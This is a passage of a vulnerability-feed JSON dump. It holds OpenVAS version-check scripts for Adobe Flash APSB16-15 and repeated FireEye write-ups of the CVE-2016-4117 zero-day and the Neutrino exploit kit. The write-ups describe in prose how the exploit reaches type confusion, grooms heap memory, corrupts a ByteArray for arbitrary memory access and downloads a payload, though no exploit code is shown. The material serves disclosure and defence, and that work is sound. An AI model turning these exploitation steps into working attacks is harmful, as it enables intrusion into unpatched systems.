"2017-03-18T00:00:00", "type": "openvas", "title": "Adobe Flash Player Within Google Chrome Security Update (apsb16-15) - Mac OS X", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1100", "CVE-2016-4121", "CVE-2016-1109", "CVE-2016-1107", "CVE-2016-4120", "CVE-2016-1102", "CVE-2016-1098", "CVE-2016-4108", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-4117", "CVE-2016-4163", "CVE-2016-4116", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", "CVE-2016-4113", "CVE-2016-4160", "CVE-2016-4112", "CVE-2016-1106", "CVE-2016-4162", "CVE-2016-4111", "CVE-2016-1108", "CVE-2016-1096", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-4115", "CVE-2016-1105", "CVE-2016-4161", "CVE-2016-1099"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310810656", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810656", "sourceData": "############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Security Update (apsb16-15) - Mac OS X\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810656\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-1096\", \"CVE-2016-1097\", \"CVE-2016-1098\", \"CVE-2016-1099\",\n \"CVE-2016-1100\", \"CVE-2016-1101\", \"CVE-2016-1102\", \"CVE-2016-1103\",\n \"CVE-2016-1104\", \"CVE-2016-1105\", \"CVE-2016-1106\", \"CVE-2016-1107\",\n \"CVE-2016-1108\", \"CVE-2016-1109\", \"CVE-2016-1110\", \"CVE-2016-4108\",\n \"CVE-2016-4109\", \"CVE-2016-4110\", \"CVE-2016-4111\", \"CVE-2016-4112\",\n \"CVE-2016-4113\", \"CVE-2016-4114\", \"CVE-2016-4115\", \"CVE-2016-4116\",\n \"CVE-2016-4117\", \"CVE-2016-4120\", \"CVE-2016-4121\", \"CVE-2016-4160\",\n \"CVE-2016-4161\", \"CVE-2016-4162\", \"CVE-2016-4163\");\n script_bugtraq_id(90620, 90621, 90505, 90619, 90618, 90617, 90616);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-18 15:02:10 +0530 (Sat, 18 Mar 2017)\");\n script_name(\"Adobe Flash Player Within Google Chrome Security Update (apsb16-15) - Mac OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple 
use-after-free vulnerabilities.\n\n - A heap buffer overflow vulnerability.\n\n - A buffer overflow vulnerability.\n\n - Multiple memory corruption vulnerabilities.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to execute arbitrary code and\n also some unknown impact.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player for chrome versions\n before 21.0.0.242 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player for chrome\n version 21.0.0.242 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/MacOSX/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"21.0.0.242\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"21.0.0.242\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:35:29", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-05-17T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SU-2016:1305-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1030", "CVE-2016-1100", "CVE-2016-1109", "CVE-2016-1107", "CVE-2016-1020", 
"CVE-2016-1022", "CVE-2016-1102", "CVE-2016-1026", "CVE-2016-1098", "CVE-2016-1021", "CVE-2016-4108", "CVE-2016-1019", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-1018", "CVE-2016-4117", "CVE-2016-1013", "CVE-2016-4116", "CVE-2016-1006", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", "CVE-2016-1023", "CVE-2016-4113", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-4112", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", "CVE-2016-1106", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-4111", "CVE-2016-1108", "CVE-2016-1096", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-1025", "CVE-2016-4115", "CVE-2016-1016", "CVE-2016-1105", "CVE-2016-1099", "CVE-2016-1015"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851312", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851312", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851312\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-05-17 13:40:35 +0200 (Tue, 17 May 2016)\");\n script_cve_id(\"CVE-2016-1006\", \"CVE-2016-1011\", \"CVE-2016-1012\", \"CVE-2016-1013\",\n \"CVE-2016-1014\", \"CVE-2016-1015\", \"CVE-2016-1016\", \"CVE-2016-1017\",\n \"CVE-2016-1018\", \"CVE-2016-1019\", \"CVE-2016-1020\", \"CVE-2016-1021\",\n \"CVE-2016-1022\", \"CVE-2016-1023\", \"CVE-2016-1024\", \"CVE-2016-1025\",\n \"CVE-2016-1026\", \"CVE-2016-1027\", \"CVE-2016-1028\", \"CVE-2016-1029\",\n \"CVE-2016-1030\", \"CVE-2016-1031\", \"CVE-2016-1032\", \"CVE-2016-1033\",\n \"CVE-2016-1096\", \"CVE-2016-1097\", \"CVE-2016-1098\", \"CVE-2016-1099\",\n \"CVE-2016-1100\", \"CVE-2016-1101\", \"CVE-2016-1102\", \"CVE-2016-1103\",\n \"CVE-2016-1104\", \"CVE-2016-1105\", \"CVE-2016-1106\", \"CVE-2016-1107\",\n \"CVE-2016-1108\", \"CVE-2016-1109\", \"CVE-2016-1110\", \"CVE-2016-4108\",\n \"CVE-2016-4109\", \"CVE-2016-4110\", \"CVE-2016-4111\", \"CVE-2016-4112\",\n \"CVE-2016-4113\", \"CVE-2016-4114\", \"CVE-2016-4115\", \"CVE-2016-4116\",\n \"CVE-2016-4117\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2016:1305-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n 
script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for flash-player fixes the following issues:\n\n - Security update to 11.2.202.621 (bsc#979422):\n\n * APSA16-02, APSB16-15, CVE-2016-1096, CVE-2016-1097, CVE-2016-1098,\n CVE-2016-1099, CVE-2016-1100, CVE-2016-1101, CVE-2016-1102,\n CVE-2016-1103, CVE-2016-1104, CVE-2016-1105, CVE-2016-1106,\n CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110,\n CVE-2016-4108, CVE-2016-4109, CVE-2016-4110, CVE-2016-4111,\n CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115,\n CVE-2016-4116, CVE-2016-4117\n\n - The following CVEs got fixed during the previous release, but got\n published afterwards:\n\n * APSA16-01, APSB16-10, CVE-2016-1006, CVE-2016-1011, CVE-2016-1012,\n CVE-2016-1013, CVE-2016-1014, CVE-2016-1015, CVE-2016-1016,\n CVE-2016-1017, CVE-2016-1018, CVE-2016-1019, CVE-2016-1020,\n CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024,\n CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028,\n CVE-2016-1029, CVE-2016-1030, CVE-2016-1031, CVE-2016-1032,\n CVE-2016-1033\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"SUSE-SU\", value:\"2016:1305-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED12\\.0SP0\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n 
if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.621~130.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.621~130.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fireeye": [{"lastseen": "2017-11-17T14:44:06", "description": "On May 8, 2016, FireEye detected an attack exploiting a previously unknown vulnerability in Adobe Flash Player (CVE-2016-4117) and reported the issue to the Adobe Product Security Incident Response Team (PSIRT). Adobe released a patch for the vulnerability in [APSB16-15](<https://helpx.adobe.com/security/products/flash-player/apsb16-15.html>) just four days later.\n\nAttackers had embedded the Flash exploit inside a Microsoft Office document, which they then hosted on their web server, and used a Dynamic DNS (DDNS) domain to reference the document and payload. With this configuration, the attackers could disseminate their exploit via URL or email attachment. Although this vulnerability resides within Adobe Flash Player, threat actors designed this particular attack for a target running Windows and Microsoft Office.\n\n### Attack Summary\n\nUpon opening the document, the exploit downloads and executes a payload from the attacker\u2019s server. To avoid suspicion, the attacker then shows the victim a decoy document. The full exploit chain proceeds as follows:\n\n 1. The victim opens the malicious Office document. \n 1. The Office document renders an embedded Flash file. \n 1. If the Flash Player version is older than 21.0.0.196, the attack aborts.\n 2. Otherwise, the attack runs the encoded Flash exploit.\n 2. The exploit runs embedded native shellcode. \n 1. 
The shellcode downloads and executes a second shellcode from the attacker\u2019s server.\n 3. The second shellcode: \n 1. Downloads and executes malware.\n 2. Downloads and displays a decoy document.\n 4. The malware connects to a second server for command and control (C2) and waits for further instructions.\n\nThis process is shown in Figure 1.\n\n\n\nFigure 1 Attack flow chart\n\n### CVE-2016-4117 Exploitation Details\n\nAn out-of-bound read vulnerability exists in the com.adobe.tvsdk.mediacore.timeline.operations. DeleteRangeTimelineOperation module. By extending the DeleteRangeTimelineOperation class, one can define a property that conflicts with the inner interface name. In this exploit, the author chose \u201cplacement\u201d as the property name, as shown in Figure 2. Referencing the interface causes the ActionScript Virtual Machine to call the internal function getBinding to get a bind id. Because the \u201cplacement\u201d property conflicts with the \u201cplacement\u201d interface name, the attacker can manipulate the bind id, and ultimately induce type confusion.\n\n\n\nFigure 2 Placement interface vs. class definition\n\n### Memory layout\n\nBefore triggering the vulnerability, the exploit defines an object that extends ByteArray. The definition is modified to contain easily distinguishable values that aid in locating objects in memory. Then, the exploit allocates a set of these objects to control the memory layout (Figure 3). 
\n\n \n \nFigure 3 Prepare heap memory layout\n\nThese objects look as follows when in memory:\n\n\n\nThe exploit then uses the type-confused DeleteRangeTimelineOperation object to read out of bounds and find one of the extended ByteArray objects based upon looking for the pre-defined property values (shown in Figure 4), and manipulates the data buffer pointer to an attacker-controlled area.\n\n\n\nFigure 4 Finding target ByteArray\n\nWith the ability to read and write individual values in the extended ByteArray object, the attacker can corrupt one of the objects to extend its length to 0xffffffff, and its data buffer to address 0. Future reads and writes to the corrupted ByteArray may then access all of the user space memory (Figure 5).\n\n\n\nFigure 5 RW primitive and execute shellcode\n\n### Code execution\n\nOnce the exploit can read and write arbitrarily in memory, it executes embedded shellcode. The shellcode downloads a second stage of shellcode from the attacker\u2019s server, which then downloads and executes the malware payload and displays the decoy document.\n\n### Conclusion\n\nCVE-2016-4117 was recently exploited in targeted attacks. Just four days after notification, Adobe released a security update for Flash Player that patched the underlying vulnerability. Users who require Flash Player in their environment should download this timely patch to protect their systems from exploitation. 
Additionally, Flash Player users could consider employing additional mitigations, such as EMET from Microsoft, to make their systems more difficult and costly to exploit.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-13T20:00:00", "type": "fireeye", "title": "CVE-2016-4117: Flash Zero-Day Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4117"], "modified": "2016-05-13T20:00:00", "id": "FIREEYE:529A9C9970A2887D6BB05A18FF5EB97C", "href": "https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-11-04T00:25:37", "description": "On May 8, 2016, FireEye detected an attack exploiting a previously unknown vulnerability in Adobe Flash Player (CVE-2016-4117) and reported the issue to the Adobe Product Security Incident Response Team (PSIRT). 
Adobe released a patch for the vulnerability in [APSB16-15](<https://helpx.adobe.com/security/products/flash-player/apsb16-15.html>) just four days later.\n\nAttackers had embedded the Flash exploit inside a Microsoft Office document, which they then hosted on their web server, and used a Dynamic DNS (DDNS) domain to reference the document and payload. With this configuration, the attackers could disseminate their exploit via URL or email attachment. Although this vulnerability resides within Adobe Flash Player, threat actors designed this particular attack for a target running Windows and Microsoft Office.\n\n### Attack Summary\n\nUpon opening the document, the exploit downloads and executes a payload from the attacker\u2019s server. To avoid suspicion, the attacker then shows the victim a decoy document. The full exploit chain proceeds as follows:\n\n 1. The victim opens the malicious Office document. \n 1. The Office document renders an embedded Flash file. \n 1. If the Flash Player version is older than 21.0.0.196, the attack aborts.\n 2. Otherwise, the attack runs the encoded Flash exploit.\n 2. The exploit runs embedded native shellcode. \n 1. The shellcode downloads and executes a second shellcode from the attacker\u2019s server.\n 3. The second shellcode: \n 1. Downloads and executes malware.\n 2. Downloads and displays a decoy document.\n 4. The malware connects to a second server for command and control (C2) and waits for further instructions.\n\nThis process is shown in Figure 1.\n\n\n\nFigure 1 Attack flow chart\n\n### CVE-2016-4117 Exploitation Details\n\nAn out-of-bound read vulnerability exists in the com.adobe.tvsdk.mediacore.timeline.operations. DeleteRangeTimelineOperation module. By extending the DeleteRangeTimelineOperation class, one can define a property that conflicts with the inner interface name. In this exploit, the author chose \u201cplacement\u201d as the property name, as shown in Figure 2. 
Referencing the interface causes the ActionScript Virtual Machine to call the internal function getBinding to get a bind id. Because the \u201cplacement\u201d property conflicts with the \u201cplacement\u201d interface name, the attacker can manipulate the bind id, and ultimately induce type confusion.\n\n\n\nFigure 2 Placement interface vs. class definition\n\n### Memory layout\n\nBefore triggering the vulnerability, the exploit defines an object that extends ByteArray. The definition is modified to contain easily distinguishable values that aid in locating objects in memory. Then, the exploit allocates a set of these objects to control the memory layout (Figure 3). \n\n \n \nFigure 3 Prepare heap memory layout\n\nThese objects look as follows when in memory:\n\n\n\nThe exploit then uses the type-confused DeleteRangeTimelineOperation object to read out of bounds and find one of the extended ByteArray objects based upon looking for the pre-defined property values (shown in Figure 4), and manipulates the data buffer pointer to an attacker-controlled area.\n\n\n\nFigure 4 Finding target ByteArray\n\nWith the ability to read and write individual values in the extended ByteArray object, the attacker can corrupt one of the objects to extend its length to 0xffffffff, and its data buffer to address 0. Future reads and writes to the corrupted ByteArray may then access all of the user space memory (Figure 5).\n\n\n\nFigure 5 RW primitive and execute shellcode\n\n### Code execution\n\nOnce the exploit can read and write arbitrarily in memory, it executes embedded shellcode. The shellcode downloads a second stage of shellcode from the attacker\u2019s server, which then downloads and executes the malware payload and displays the decoy document.\n\n### Conclusion\n\nCVE-2016-4117 was recently exploited in targeted attacks. Just four days after notification, Adobe released a security update for Flash Player that patched the underlying vulnerability. 
Users who require Flash Player in their environment should download this timely patch to protect their systems from exploitation. Additionally, Flash Player users could consider employing additional mitigations, such as EMET from Microsoft, to make their systems more difficult and costly to exploit.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-14T00:00:00", "type": "fireeye", "title": "CVE-2016-4117: Flash Zero-Day Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4117"], "modified": "2016-05-14T00:00:00", "id": "FIREEYE:FE931C46CDF99DA3A4567E123E342C99", "href": "https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-03-07T16:24:19", "description": "On May 8, 2016, FireEye detected an attack exploiting a previously unknown vulnerability in Adobe Flash Player (CVE-2016-4117) and reported the issue to the Adobe Product Security Incident Response Team (PSIRT). 
Adobe released a patch for the vulnerability in [APSB16-15](<https://helpx.adobe.com/security/products/flash-player/apsb16-15.html>) just four days later.\n\nAttackers had embedded the Flash exploit inside a Microsoft Office document, which they then hosted on their web server, and used a Dynamic DNS (DDNS) domain to reference the document and payload. With this configuration, the attackers could disseminate their exploit via URL or email attachment. Although this vulnerability resides within Adobe Flash Player, threat actors designed this particular attack for a target running Windows and Microsoft Office.\n\n### Attack Summary\n\nUpon opening the document, the exploit downloads and executes a payload from the attacker\u2019s server. To avoid suspicion, the attacker then shows the victim a decoy document. The full exploit chain proceeds as follows:\n\n 1. The victim opens the malicious Office document. \n 1. The Office document renders an embedded Flash file. \n 1. If the Flash Player version is older than 21.0.0.196, the attack aborts.\n 2. Otherwise, the attack runs the encoded Flash exploit.\n 2. The exploit runs embedded native shellcode. \n 1. The shellcode downloads and executes a second shellcode from the attacker\u2019s server.\n 3. The second shellcode: \n 1. Downloads and executes malware.\n 2. Downloads and displays a decoy document.\n 4. The malware connects to a second server for command and control (C2) and waits for further instructions.\n\nThis process is shown in Figure 1.\n\n\n\nFigure 1 Attack flow chart\n\n### CVE-2016-4117 Exploitation Details\n\nAn out-of-bounds read vulnerability exists in the com.adobe.tvsdk.mediacore.timeline.operations.DeleteRangeTimelineOperation module. By extending the DeleteRangeTimelineOperation class, one can define a property that conflicts with the inner interface name. In this exploit, the author chose \u201cplacement\u201d as the property name, as shown in Figure 2. 
Referencing the interface causes the ActionScript Virtual Machine to call the internal function getBinding to get a bind id. Because the \u201cplacement\u201d property conflicts with the \u201cplacement\u201d interface name, the attacker can manipulate the bind id, and ultimately induce type confusion.\n\n\n\nFigure 2 Placement interface vs. class definition\n\n### Memory layout\n\nBefore triggering the vulnerability, the exploit defines an object that extends ByteArray. The definition is modified to contain easily distinguishable values that aid in locating objects in memory. Then, the exploit allocates a set of these objects to control the memory layout (Figure 3). \n\n \n \nFigure 3 Prepare heap memory layout\n\nThese objects look as follows when in memory:\n\n\n\nThe exploit then uses the type-confused DeleteRangeTimelineOperation object to read out of bounds and find one of the extended ByteArray objects based upon looking for the pre-defined property values (shown in Figure 4), and manipulates the data buffer pointer to an attacker-controlled area.\n\n\n\nFigure 4 Finding target ByteArray\n\nWith the ability to read and write individual values in the extended ByteArray object, the attacker can corrupt one of the objects to extend its length to 0xffffffff, and its data buffer to address 0. Future reads and writes to the corrupted ByteArray may then access all of the user space memory (Figure 5).\n\n\n\nFigure 5 RW primitive and execute shellcode\n\n### Code execution\n\nOnce the exploit can read and write arbitrarily in memory, it executes embedded shellcode. The shellcode downloads a second stage of shellcode from the attacker\u2019s server, which then downloads and executes the malware payload and displays the decoy document.\n\n### Conclusion\n\nCVE-2016-4117 was recently exploited in targeted attacks. Just four days after notification, Adobe released a security update for Flash Player that patched the underlying vulnerability. 
Users who require Flash Player in their environment should download this timely patch to protect their systems from exploitation. Additionally, Flash Player users could consider employing additional mitigations, such as EMET from Microsoft, to make their systems more difficult and costly to exploit.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-13T20:00:00", "type": "fireeye", "title": "CVE-2016-4117: Flash Zero-Day Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4117"], "modified": "2016-05-13T20:00:00", "id": "FIREEYE:F598C2CB5A87E8844CDF2684E4B9200D", "href": "https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-11-04T00:25:29", "description": "A security researcher recently published [source code](<https://github.com/theori-io/cve-2016-0189>) for a working exploit for CVE-2016-0189 and the Neutrino Exploit Kit (EK) quickly adopted it.\n\nCVE-2016-0189 was originally exploited as a 
zero-day vulnerability in [targeted attacks in Asia](<http://www.symantec.com/connect/blogs/internet-explorer-zero-day-exploit-used-targeted-attacks-south-korea>). The vulnerability resides within scripting engines in Microsoft\u2019s Internet Explorer (IE) browser, and is exploited to achieve Remote Code Execution (RCE). According to the researcher\u2019s repository, the open source exploit affects IE on at least Windows 10. It is possible that attackers could use or repurpose the attack for earlier versions of Windows.\n\nMicrosoft patched [CVE-2016-0189 in May on Patch Tuesday](<https://technet.microsoft.com/en-us/library/security/ms16-may.aspx>). Applying this patch will protect a system from this exploit.\n\n##### Attack Details \n\n\nThe popular Neutrino EK was quick to adopt this exploit. Neutrino works by embedding multiple exploits into one Shockwave Flash (SWF) file. Once run, the SWF profiles the victim\u2019s system \u2013 shown in Figure 1 \u2013 to determine which of its embedded exploits to use.\n\n\n\nFigure 1. Neutrino EK SWF profiles a victim\n\nNext, it decrypts and runs the applicable exploit, as shown in Figure 2. This is different from most other EKs, in which an earlier HTML/JavaScript stage profiles the browser and selectively downloads exploits from the server.\n\n\n\nFigure 2. Decrypt and embed the selected exploit into an iframe\n\nIn this example, Neutrino embedded exploits for five vulnerabilities that have been patched since May or earlier: three for Adobe Flash Player (CVE-2016-4117, CVE-2016-1019, CVE-2015-8651) and two for Internet Explorer (CVE-2016-0189, CVE-2014-6332). CVE-2016-0189 is the newest addition to Neutrino\u2019s arsenal.\n\n##### CVE-2016-0189\n\nThis CVE-2016-0189 vulnerability stems from a failure to put a lock on an array before working on it. This omission can lead to an issue when the array is changed while another function is in the middle of working on it. 
Memory corruption can occur if the \u201cvalueOf \u201c property of the array is set to a script function that changes the array size, as shown in Figure 3.\n\n\n\nFigure 3. Neutrino setting triggering conditions\n\nAfter Microsoft released the patch, a security researcher compared the original and patched programs to identify the root cause of the vulnerability and create a fully functioning exploit. The exploit embedded within Neutrino is identical to this researcher\u2019s exploit, except for the code that runs after initial control.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-14T20:37:00", "type": "fireeye", "title": "Exploit Kits Quickly Adopt Exploit Thanks to Open Source Release", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 